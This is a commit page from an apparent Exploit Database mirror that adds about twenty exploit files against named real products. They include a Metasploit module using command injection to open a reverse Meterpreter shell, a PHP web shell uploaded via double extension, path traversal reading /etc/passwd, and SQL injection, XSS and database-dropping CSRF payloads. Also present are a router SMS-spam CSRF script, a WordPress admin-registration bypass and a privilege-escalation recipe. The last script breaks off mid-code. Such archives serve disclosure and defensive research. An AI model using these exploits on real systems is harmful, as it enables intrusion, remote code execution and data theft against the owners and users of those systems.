bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-01-08

Browse source 
19 changes to exploits/shellcodes

Microsoft Edge 44.17763.1.0 - NULL Pointer Dereference
BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)
SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC)
Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)

KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation

Mailcleaner - Authenticated Remote Code Execution (Metasploit)
Embed Video Scripts - Persistent Cross-Site Scripting
All in One Video Downloader 1.2 - Authenticated SQL Injection
LayerBB 1.1.1 - Persistent Cross-Site Scripting
MyBB OUGC Awards Plugin 1.8.3 - Persistent Cross-Site Scripting
PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Scripting
phpMoAdmin MongoDB GUI 1.1.5 - Cross-Site Request Forgery / Cross-Site Scripting
Wordpress Plugin UserPro < 4.9.21 - User Registration Privilege Escalation
MyT Project Management 1.5.1 - 'Charge[group_total]' SQL Injection
Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal
Ajera Timesheets 9.10.16 - Deserialization of Untrusted Data
Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery
Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection
Huawei E5330 21.210.09.00.158 - Cross-Site Request Forgery (Send SMS)
This commit is contained in:
Offensive Security 2019-01-08 05:01:58 +00:00
parent e8dcb9f022
commit deaee53895
20 changed files with 1163 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

20
exploits/cgi/webapps/46081.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Reflected XSS
# Date: 21/12/2018
# Exploit Author: Kumar Saurav
# Reference: https://0dayfindings.home.blog/2018/12/26/plc-wireless-router-gpn2-4p21-c-cn-reflected-xss/
# Vendor: ChinaMobile
# Category: Hardware
# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
# Tested on: Multiple
# CVE : CVE-2018-20326
#Description: PLC Wireless Router's are vulnerable to a Reflected Cross Site Scripting (XSS).With this attack, the threat actor can steal cookies, session id, username or other sensitive information redirect an innocent victim to a malicious website, thus compromising the user.
Reproduction Steps:
Step 1: Go to Wi-fi Router Gateway (192.168.59.254 in my case)
Step 2: Login as Username and Password
Step 3: After Login below url will be shown
(http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-)
Step 4: Insert the payload "<script>alert("XSS-Saurav")</script>" at the end of the above mentinoed url and hit enter
(http://192.168.59.254/cgi-bin/webprocgetpage=html/index.html&errorpage=html/main.html&var:language=en_us&var:menu=setup&var:page=connected&var:subpage=-<script>alert("XSS-Saurav")</script>)
Step 5: On execution of the payload, it will be popped up as "XSS-Saurav"

49
exploits/hardware/webapps/46092.py Executable file
View file

@ -0,0 +1,49 @@
# Exploit Title: Huawei E5330 Cross-Site Request Forgery (Send SMS)
# Date: 01/07/2019
# Exploit Author: Nathu Nandwani
# Website: http://nandtech.co/
# Vendor Homepage: https://consumer.huawei.com/in/mobile-broadband/e5330/
# Version: 21.210.09.00.158
# Tested on: Windows 10 x64
# CVE: CVE-2014-5395
# Note: The administrator who opens the URL should be authenticated.
import socket
import time
server_ip = "0.0.0.0"
server_port = 80
huawei_ip = "192.168.8.1"
receiving_phone_no = "01234567890"
sms_text = "This is a SPAM text from Huawei E5330"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((server_ip, server_port))
sock.listen(1)
print "Currently listening at " + server_ip + ":" + str(server_port)
client, (client_host, client_port) = sock.accept()
print "Client connected: " + client_host + ":" + str(client_port)
print ""
print client.recv(1000)
client.send('HTTP/1.0 200 OK\r\n')
client.send('Content-Type: text/html\r\n')
client.send('\r\n')
client.send("""
<html>
<body>
<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://""" + huawei_ip + """/api/sms/send-sms", true);
xhr.send('<?xml version="1.0" encoding="UTF-8"?><request><Index>0</Index><Phones><Phone>""" + receiving_phone_no + """</Phone></Phones><Sca></Sca><Content>""" + sms_text + """</Content><Length>""" + str(len(sms_text)) + """</Length><Reserved>1</Reserved><Date>""" + time.strftime('%Y-%m-%d %H:%M:%S') + """</Date></request>');
</script>
</body>
</html>
""")
client.close()
sock.close()

36
exploits/php/webapps/46076.txt Normal file
View file

@ -0,0 +1,36 @@
# Exploit Title: Embed Video Scripts - Cross-site Script (stored)
# Google Dork: N/A
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# POC Video: https://youtu.be/2CFJLwkxpT8
# Vendor Homepage: https://codeawesome.in/embed/
# Software Link: https://codecanyon.net/item/embed-video-scripts/20831073
# Demo Website: https://codeawesome.in/embed/
# Version: N/A
# Tested on: WIN7_x68/Linux
# CVE : N/A
# Description:
A stored xss found in "Embed Video Scripts" comments section.
# POC Request:
:method: POST
:authority: server
:scheme: https
:path: /embed/comments
content-length: 145
accept: */*
origin: https://server
x-requested-with: XMLHttpRequest
user-agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
content-type: application/x-www-form-urlencoded; charset=UTF-8
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: __cfduid=de9f1151befbf3ccdb372b7c1afb0a3bb1546252540
cookie: _tccl_visitor=208f2702-6472-41aa-b129-088a32f1eda6
cookie: _tccl_visit=208f2702-6472-41aa-b129-088a32f1eda6
message=<script>alert('Deyaa)</script>&post_id=1&save=1&avatar=https%3A%2F%2Fserver%2Fembed%2Fassets%2Fimages%2Favatar%2F1.png

20
exploits/php/webapps/46077.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: All in One Video Downloader 1.2 - SQL Injection
# Google Dork: "developed by Niche Office"
# Date: 1 Jan 2019
# Exploit Author: Deyaa Muhammad
# Author EMail: contact [at] deyaa.me
# Author Blog: http://deyaa.me
# Vendor Homepage: https://nicheoffice.web.tr/
# Software Link: https://codecanyon.net/item/all-in-one-video-downloader-youtube-and-more/22599418
# Demo Website: https://aiovideodl.ml/
# Demo Admin Panel: https://aiovideodl.ml/admin/
# Demo Admin Credentials: demo@aiovideodl.ml/123456
# Version: 1.2
# Tested on: WIN7_x68/cloudflare
# CVE : N/A
# POC:
https://[PATH]/admin/?view=page-edit&id=2.9'+[SQLI]-- -
# Exploit:
https://[PATH]/admin/?view=page-edit&id=2.9'+UNION+SELECT+1,2,3,4,concat(user(),0x3a3a,database(),0x3a3a,version())-- -

24
exploits/php/webapps/46079.txt Normal file
View file

@ -0,0 +1,24 @@
# Exploit Title: LayerBB 1.1.1 - Cross-Site Scripting
# Date: 10/4/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://forum.layerbb.com/downloads.php?view=file&id=26
# Version: 1.1.1
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-17997
1. Description:
LayerBB is a free open-source forum software. The XSS found allows users to add a payload to the title of conversations (PMs).
2. Proof of Concept:
- Start a new conversation sending to any user (victim) you want
- Use a payload in the title <script>alert('XSS')</script>
- Next time the user (victim) visits the site payload will execute
3. Solution:
Update to 1.1.2

26
exploits/php/webapps/46080.txt Normal file
View file

@ -0,0 +1,26 @@
# Exploit Title: MyBB OUGC Awards Plugin v1.8.3 - Cross-Site Scripting
# Date: 12/31/2018
# Author: 0xB9
# Twitter: @0xB9Sec
# Contact: 0xB9[at]pm.me
# Software Link: https://community.mybb.com/mods.php?action=view&pid=396
# Version: 1.8.3
# Tested on: Ubuntu 18.04
# CVE: CVE-2019-3501
1. Description:
OUGC Awards plugin for MyBB forum allows admins and moderators to grant awards to users which displays on profiles/posts. The reason input isn't sanitized on awards page and user profiles.
2. Proof of Concept:
- Have a mod account level or higher
- Go to Manage Awards in ModCP
- Give an award to a user and input payload for reason <script>alert('XSS')</script>
- Payload executes when viewing award on awards.php and user profiles.
3. Solution:
Update to 1.8.19

157
exploits/php/webapps/46082.txt Normal file
View file

@ -0,0 +1,157 @@
##################################################################################################################################
# Exploit Title: phpMoAdmin 1.1.5 - MongoDB GUI | Multiple Vulnerabilities
# Date: 03.01.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: http://www.phpmoadmin.com
# Software Link: http://www.phpmoadmin.com/file/phpmoadmin.zip
# Version: 1.1.5
##################################################################################################################################
Introduction
phpMoAdmin - MongoDB GUI
MongoDB administration tool for PHP
Vulnerabilities: CSRF | XSS Reflected & Stored
CSRF details:
#################################################################################
CSRF1
Create Database
<html>
<body>
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET">
<input type="text" name="db" value="new.database"/>
<input type="text" name="newdb" value="testdb"/>
<input type="submit" value="Create DB"/>
</form>
</body>
</html>
#################################################################################
CSRF2
Drop Database
<html>
<body>
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET">
<input type="text" name="action" value="dropDb"/>
<input type="text" name="db" value="testdb"/>
<input type="submit" value="Drop DB"/>
</form>
</body>
</html>
#################################################################################
CSRF3
Repair Database
<html>
<body>
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET">
<input type="text" name="action" value="repairDb"/>
<input type="text" name="db" value="testdb"/>
<input type="submit" value="Repair DB"/>
</form>
</body>
</html>
#################################################################################
CSRF4
Add New Collection
<html>
<body>
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET">
<input type="text" name="action" value="createCollection"/>
<input type="text" name="db" value="testdb"/>
<input type="text" name="collection" value="testcollection"/>
<input type="submit" value="Create Collection"/>
</form>
</body>
</html>
#################################################################################
CSRF5
Drop Collection
<html>
<body>
<form action="http://localhost/phpmoadmin/moadmin.php" method="GET">
<input type="text" name="action" value="dropCollection"/>
<input type="text" name="db" value="testdb"/>
<input type="text" name="collection" value="testcollection"/>
<input type="submit" value="Drop Collection"/>
</form>
</body>
</html>
#################################################################################
XSS details:
#################################################################################
XSS1 | Reflected
URL
http://localhost/phpmoadmin/moadmin.php?db=admin%3Cscript%3Ealert(1)%3C/script%3E
METHOD
Get
PARAMETER
db
PAYLOAD
<script>alert(1)</script>
#################################################################################
XSS2 | Reflected
URL
http://localhost/phpmoadmin/moadmin.php?db=new.database&newdb=testdb%3Cscript%3Ealert(2)%3C/script%3E
METHOD
Get
PARAMETER
newdb
PAYLOAD
<script>alert(2)</script>
#################################################################################
XSS3 | Stored
URL
http://localhost/phpmoadmin/moadmin.php?collection=%3Cscript%3Ealert%283%29%3C%2Fscript%3E&action=createCollection&db=testdb
METHOD
Get
PARAMETER
collection
PAYLOAD
<script>alert(3)</script>
#################################################################################

54
exploits/php/webapps/46083.txt Normal file
View file

@ -0,0 +1,54 @@
# Exploit Title: Wordpress Plugin UserPro < 4.9.21 User Registration With Administrator Role
# Google Dork: inurl:/wp-content/plugins/userpro/
# Date: 3rd January, 2019
# Exploit Author: Noman Riffat
# Vendor Homepage: https://userproplugin.com/
# Software Link: https://codecanyon.net/item/userpro-user-profiles-with-social-login/5958681
# Version: < 4.9.21
# Tested on: Wordpress 4.9.9 with linux but should work on all WP versions and OS as well
UserPro fixed a user registration with administrator privileges vulnerability in version 4.9.21
But there wasn't any POC available so this exploit demonstrates this
vulnerability.
https://demo.userproplugin.com/wp-content/plugins/userpro/changelog.txt
From the changelog: "Security Fix : Registration role validation fix"
The latest version up to now is 4.9.29
The vulnerability allows anyone to register with Administrator role which
can easily be turned into RCE
Steps to reproduce:
1. Go to the registration form, input random fake values, trigger Burp
Suite and click submit.
2. The POST data will look similar to following
redirect_uri-701=&_myuserpro_nonce=xxxxxx&_wp_http_referer=%2F&unique_id=701&user_login-701=USERNAME&user_email-701=
USERNAME@EMAIL.COM
&user_pass-701=PASSWORD&user_pass_confirm-701=PASSWORD&display_name-701=&profilepicture-701=&country-701=&facebook-701=&twitter-701=&google_plus-701=&user_url-701=&terms=on&action=userpro_process_form&template=register&group=default&shortcode=xxxxxxxxxxxxxxxxxxxxxxxxxxx
Here "-701" is a random postfix number and gets stripped at the server.
Other than that, the interesting values are
user_login
user_email
user_pass
user_pass_confirm
3. Adding following extra parameter in POST data will register the user
with Administrator privileges
role-701=administrator
So the modified POST data will look similar to following
role-701=administrator&redirect_uri-701=&_myuserpro_nonce=xxxxxx&....snip....snip....
4. Forward the POST data in Burp Suite and you will get redirect to
/profile/ page with Administrator menu on top. Access /wp-admin/ to get to
the dashboard
5. Upload shell with default methods
@nomanriffat

34
exploits/php/webapps/46084.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: MyT-PM 1.5.1 - 'Charge[group_total]' SQL Injection
# Date: 03.01.2019
# Exploit Author: Mehmet Önder Key
# Vendor Homepage: https://manageyourteam.net/
# Software Link: https://sourceforge.net/projects/myt/
# Version: v1.5.1
# Category: Webapps
# Tested on: WAMPP @Win
# Software description:
MyT (Manage Your Team) - is a free open source task management and project
management system, based on Yii Framework, easy to use and with a great
perspective of growth for the future.
# Vulnerabilities:
# An attacker can access all data following an un/authorized user login
using the parameter.
# POC - SQL Injection :
# Parameter: Charge[group_total](POST)
# Request URL: /charge/admin
# Type : Error Based
# Payload: Charge[user_name]=k&Charge[group_total]=1) AND
EXTRACTVALUE(2003,CONCAT(0x5c,0x7171716b71,(SELECT
(ELT(2003=2003,1))),0x7170707071))-- eaYu&Charge_page=1&ajax=charge-grid
# Type : Time-Based Blind
# Payload: Charge[user_name]=k&Charge[group_total]=1) AND (SELECT * FROM
(SELECT(SLEEP(5)))ggBK)-- mGKC&Charge_page=1&ajax=charge-grid
# Type : Stacked Queries
# Payload: Charge[user_name]=k&Charge[group_total]=1);SELECT
SLEEP(5)#&Charge_page=1&ajax=charge-grid

177
exploits/php/webapps/46085.txt Normal file
View file

@ -0,0 +1,177 @@
======================================================================
Exploit Title:: Multiple Vulnerabilities
Software: Roxy Fileman
Version: 1.4.5
Vendor Homepage: http://www.roxyfileman.com/
Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-php
CVE number: CVE-2018-20525, CVE-2018-20526
Found: 2018-12-07
Tested on: PHP 7.0, Ubuntu 16.04 LTS
Author: Pongtorn Angsuchotmetee, Vittawat Masaree
SnoopBees Lab
https://www.snoopbees.com
=======================================================================
Description
===============================================================
Roxy Fileman is free open source file browser for .NET and PHP, ready for
use with CKEditor and TinyMCE WYSIWYG html editors. It could be easily
integrated into a CMS or any other web application. Fileman is based on
JQuery and JQueryUI libraries and it's compatible with all modern browsers
- Internet Explorer, Firefox, Google Chrome, Safary and Opera.
Roxy Fileman is designed to be as flexible as possible. The client
interface is completely separated from the server-side logic and scripts,
thus can be used with any server programming language - PHP, ASP .NET,
Python, Cold Fusion etc. All data exchanged including configuration and
language files is in light weight JSON format. Great performance - all data
from the server is loaded using Ajax without page reloading. Fileman has
ready to use distributions for PHP and .NET. All client-server
communications and configuration files are in JSON format and are language
independent. See custom server side scripts.
Ref: http://www.roxyfileman.com/
Vulnerability
==================================
1. Path Traversal (CVE-2018-20525)
2. Unrestricted File Upload (CVE-2018-20526)
==================================
Proof of Concept
===========================
1) Path Traversal (CVE-2018-20525)
==================================
The vulnerability affected file “copydir.php", “copyfile.php",
“fileslist.php". It is we can manipulating variables that reference files
with “dot-dot-slash (../)” to access arbitrary files and directories
access on file system. After copied the system file will appear on Roxy
file manager “http://[IP-Address]/fileman/Uploads".
#################################################
----------------------------------------------------------------------------------
1.1. copydir.php
POST /fileman/php/copydir.php HTTP/1.1
Host: 10.10.10.190
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.190/fileman/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 78
Connection: close
Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af;
roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list
d=%2Ffileman%2FUploads%2F*/../../../../../../../../etc/*&n=%2Ffileman%2FUploads/
----------------------------------------------------------------------------------
1.2. copyfile.php
POST /fileman/php/copyfile.php HTTP/1.1
Host: 10.10.10.190
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.190/fileman/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 66
Connection: close
Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af;
roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list
f=%2Ffileman%2FUploads%2F*/../../../../../../../../etc/passwd*&type=
----------------------------------------------------------------------------------
1.3. filelist.php
POST /fileman/php/fileslist.php HTTP/1.1
Host: 10.10.10.190
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.190/fileman/index.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 65
Connection: close
Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af;
roxyld=%2Ffileman%2FUploads%2FImages; roxyview=list
d=%2Ffileman%2FUploads%2FImages*/../../../../../../../../etc*&type=
##############################################################
============================
2) Unrestricted File Upload (CVE-2018-20526)
==================================
The vulnerability affected file upload.php and in the condition that the
php.ini file need have add the “*AddHandler php7-script .php*”. And now we
can upload the shell code file to the server by double extension such
as *shellcode.php.png
*
--------------------------------------------------------------------------------------------------------------------
POST /fileman/php/upload.php HTTP/1.1
Host: 10.10.10.190
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0)
Gecko/20100101 Firefox/64.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.190/fileman/index.html
Content-Type: multipart/form-data;
boundary=---------------------------67141620012509
Content-Length: 547
Connection: close
Cookie: PHPSESSID=m48hnq7i6f83tdb38kaagfn4af; roxyld=%2Ffileman%2FUploads;
roxyview=list
-----------------------------67141620012509
Content-Disposition: form-data; name="action"
upload
-----------------------------67141620012509
Content-Disposition: form-data; name="method"
ajax
-----------------------------67141620012509
Content-Disposition: form-data; name="d"
/fileman/Uploads
-----------------------------67141620012509
Content-Disposition: form-data; name="files[]"; filename="*phpshell.php.png*"
Content-Type: image/png
*<?php system($_GET[cmd]); ?> *
-----------------------------67141620012509--
-------------------------------------------------------------------------------------------------------------------------------------------
Timeline
==================================
2018-12-07: Discovered the bug
2018-12-11: Reported to vendor (The vendor is unresponsive)
2018-12-19: Reported to vendor (The vendor is unresponsive)
2018-12-27: Request CVE
2019-01-03: Advisory published
Discovered By:
=====================
Pongtorn Angsuchotmetee, Vittawat Masaree

144
exploits/python/remote/46075.rb Executable file
View file

@ -0,0 +1,144 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Mailcleaner Remote Code Execution",
'Description' => %q{
This module exploits the command injection vulnerability of MailCleaner Community Edition product. An authenticated user can execute an
operating system command under the context of the web server user which is root.
/admin/managetracing/search/search endpoint takes several user inputs and then pass them to the internal service which is responsible for executing
operating system command. One of the user input is being passed to the service without proper validation. That cause a command injection vulnerability.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/advisory-mailcleaner-community-edition-remote-code-execution/']
],
'DefaultOptions' =>
{
'SSL' => true,
'WfsDelay' => 5,
'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['python', 'unix'],
'Arch' => [ ARCH_PYTHON, ARCH_CMD ],
'Targets' =>
[
[
'Python payload',
{
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
}
],
[
'Command payload',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'BadChars' => "\x26",
}
}
]
],
'Privileged' => false,
'DisclosureDate' => "Dec 19 2018",
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
OptString.new('USERNAME', [true, 'The username to login as']),
OptString.new('PASSWORD', [true, 'The password to login with'])
]
)
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def auth
print_status('Performing authentication...')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'admin/')
})
if res && !res.get_cookies.empty?
cookie = res.get_cookies
else
fail_with(Failure::UnexpectedReply, 'Did not get cookie-set header from response.')
end
# Performing authentication
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin/'),
'cookie' => cookie,
'vars_post' => {
'username' => username,
'password' => password,
'submit' => 'Log+in'
}
})
if res && res.code == 302
print_good("Awesome..! Authenticated with #{username}:#{password}")
else
fail_with(Failure::NoAccess, 'Credentials are not valid.')
end
cookie
end
def exploit
cookie = auth
if cookie.nil?
fail_with(Failure::Unknown, 'Something went wrong!')
end
print_status('Exploiting command injection flaw')
if target['Arch'] == ARCH_PYTHON
cmd = "';$(python -c \"#{payload.encoded}\");#"
else
cmd = "';#{payload.encoded};#"
end
send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'managetracing', 'search', 'search'),
'cookie' => cookie,
'vars_post' => {
'search' => rand_text_alpha(5),
'domain' => cmd,
'submit' => 1
}
})
end
end

51
exploits/windows/dos/46078.html Normal file
View file

@ -0,0 +1,51 @@
<!--
# Exploit Title: Microsoft Edge 44.17763.1.0 NULL Pointer Dereference. Denial of Service (PoC)
# Google Dork: N/A
# Date: 2018-11-14
# Exploit Author: Bogdan Kurinnoy (b.kurinnoy@gmail.com)
# Vendor Homepage: https://www.microsoft.com/
# Version: Microsoft Edge 44.17763.1.0 (Microsoft EdgeHTML 18.17763)
# Tested on: Windows 10 x64
# CVE : N/A
# Description:
# Access violation while reading memory at 0x2D0 using a NULL ptr edgehtml!CSelectElement::SetItem+0x190
# https://developer.microsoft.com/en-us/microsoft-edge/platform/issues/19625211/
PoC.html
-->
<html>
<head>
<script>
function f1() {
try {var v1 = eventhandler1; } catch(e) { }
var v2 = document.createElementNS("http://www.w3.org/2000/svg", “pattern”);
v2.addEventListener("1", v1);
var v3 = document.createElement(“option”);
var v4 = document.createElement(“select”);
v4[4] = v3;
}
</script>
</head>
<body onload=f1()>
</body>
</html>

25
exploits/windows/dos/46087.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: BlueAuditor 1.7.2.0 - 'Key' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-01-04
# Vendor Homepage: www.nsauditor.com
# Software Link : http://www.nsauditor.com/downloads/blueauditor_setup.exe
# Tested Version: 1.7.2.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python BlueAuditor_1.7.2.0.py
# 2.- Open BlueAuditor_1.7.2.0.txt and copy content to clipboard
# 3.- Open BlueAuditor
# 4.- Register -> Enter Registration Code...
# 5.- Name: -> l4m5
# 6.- Paste ClipBoard on "Key:"
# 7.- OK
# 8.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 256
f = open ("BlueAuditor_1.7.2.0.txt", "w")
f.write(buffer)
f.close()

25
exploits/windows/dos/46088.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: SpotFTP Password Recover 2.4.2 - 'Name' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-01-04
# Vendor Homepage: www.nsauditor.com
# Software Link : http://www.nsauditor.com/downloads/spotftp_setup.exe
# Tested Version: 2.4.2
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python SpotFTP_Password_Recover_2.4.2.py
# 2.- Open SpotFTP_Password_Recover_2.4.2.txt and copy content to clipboard
# 3.- Open SpotFTP
# 4.- Register -> Enter Registration Code...
# 5.- Paste ClipBoard on "Name:"
# 6.- Key: -> L4M5
# 7.- OK
# 8.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 256
f = open ("SpotFTP_Password_Recover_2.4.2.txt", "w")
f.write(buffer)
f.close()

30
exploits/windows/dos/46089.py Executable file
View file

@ -0,0 +1,30 @@
# Exploit Title: Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC)
# Discovery by: Luis Martinez
# Discovery Date: 2019-01-04
# Vendor Homepage: https://www.foscam.es/
# Software Link : https://www.foscam.es/descarga/FoscamVMS_1.1.4.9.zip
# Tested Version: 1.1.4.9
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to Produce the Crash:
# 1.- Run python code : python FoscamVMS_1.1.4.9.py
# 2.- Open FoscamVMS_1.1.4.9.txt and copy content to clipboard
# 3.- Open FoscamVMS
# 4.- User Name -> admin
# 5.- Password ->
# 6.- Login
# 7.- System Settings
# 8.- User Management Settings
# 9.- Add
# 10.- Paste ClipBoard on "Username"
# 11.- Password -> P4ssw0rd
# 12.- Save
# 13.- Crashed
#!/usr/bin/env python
buffer = "\x41" * 150
f = open ("FoscamVMS_1.1.4.9.txt", "w")
f.write(buffer)
f.close()

71
exploits/windows/local/46093.txt Normal file
View file

@ -0,0 +1,71 @@
# Exploit Title : KioWare Server Version 4.9.6 - Weak Folder Permissions Privilege Escalation
# Date : 10/12/2018
# Exploit Author : Hashim Jawad - @ihack4falafel
# Vendor Homepage : https://www.kioware.com/
# Tested on : Windows Server 2016 Standard (x64)
# CVE : CVE-2018-18435
Description:
============
KioWare Server version 4.9.6 and older installs by default to "C:\kioware_com" with weak folder permissions granting any user full permission "Everyone: (F)" to the contents of the directory and it's sub-folders. In addition, the program installs a service called "KWSService" which runs as "Localsystem", this will allow any user to escalate privileges to "NT AUTHORITY\SYSTEM" by substituting the service's binary with a malicious one.
Proof:
======
C:\>icacls c:\kioware_com
C:\kioware_com Everyone:(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
BUILTIN\Users:(I)(CI)(AD)
BUILTIN\Users:(I)(CI)(WD)
CREATOR OWNER:(I)(OI)(CI)(IO)(F)
Successfully processed 1 files; Failed processing 0 files
C:\>sc qc KWSService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: KWSService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\kioware_com\KWSS.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : KWS Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>icacls C:\kioware_com\KWSS.exe
C:\kioware_com\KWSS.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
WIN-ONKVVSNUHKV\test:(I)(F)
Successfully processed 1 files; Failed processing 0 files
C:\>
Exploit:
========
Simply replace "KWSS.exe" with your preferred payload and wait for execution upon reboot.
# Disclosure Timeline:
# ====================
# 10-13-18: Contacted vendor
# 10-15-18: Vendor requested full report and POC
# 10-15-18: Full report and POC sent
# 10-16-18: Vendor was able to reproduce/validate the issue and filed a feature request
# 10-16-18: Asked vendor to provide timeline for patch
# 10-16-18: Requested CVE ID
# 10-17-18: CVE-2018-18435 assigned
# 10-17-18: Vendor requested 90 days timeline to patch/QA test
# 12-20-18: Vendor sent patch and requested feedback
# 12-22-18: Suggestions/modifications sent to Vendor
# 12-24-18: Vendor sent new patch and requested feedback
# 12-25-18: New Suggestions/modifications sent to Vendor
# 12-26-18: Vendor sent new patch and requested feedback
# 12-27-18: Vendor was notified that the latest patch is sufficient
# 12-31-18: Vendor released new version (v4.9.9) and patch as well
# 01-07-19: Vulnerability has been made public

60
exploits/windows/webapps/46086.txt Normal file
View file

@ -0,0 +1,60 @@
# Exploit Title: Ajera Timesheets <= 9.10.16 - Deserialization of untrusted data
# Date: 2019-01-03
# Exploit Author: Anthony Cole
# Vendor Homepage: https://www.deltek.com/en/products/project-erp/ajera
# Version: <= 9.10.16
# Contact: http://twitter.com/acole76
# Website: http://twitter.com/acole76
# Tested on: Windows 2012
# CVE: CVE-2018-20221
# Category: webapps
#
# Ajera is a software written in .NET by Deltek. Version <= 9.10.16 allows an attacker to cause the software to deserialize untrusted data that can result in remote code execution.
# Secure/SAService.rem in Deltek Ajera Timesheets <= 9.10.16 are vulnerable to remote code execution via deserialization of untrusted user input from an authenticated user. The executed code will run as the IIS Application Pool that is running the application.
#
import struct, sys, requests, zlib, argparse, urlparse, subprocess
def run_command(command):
p = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output = b''
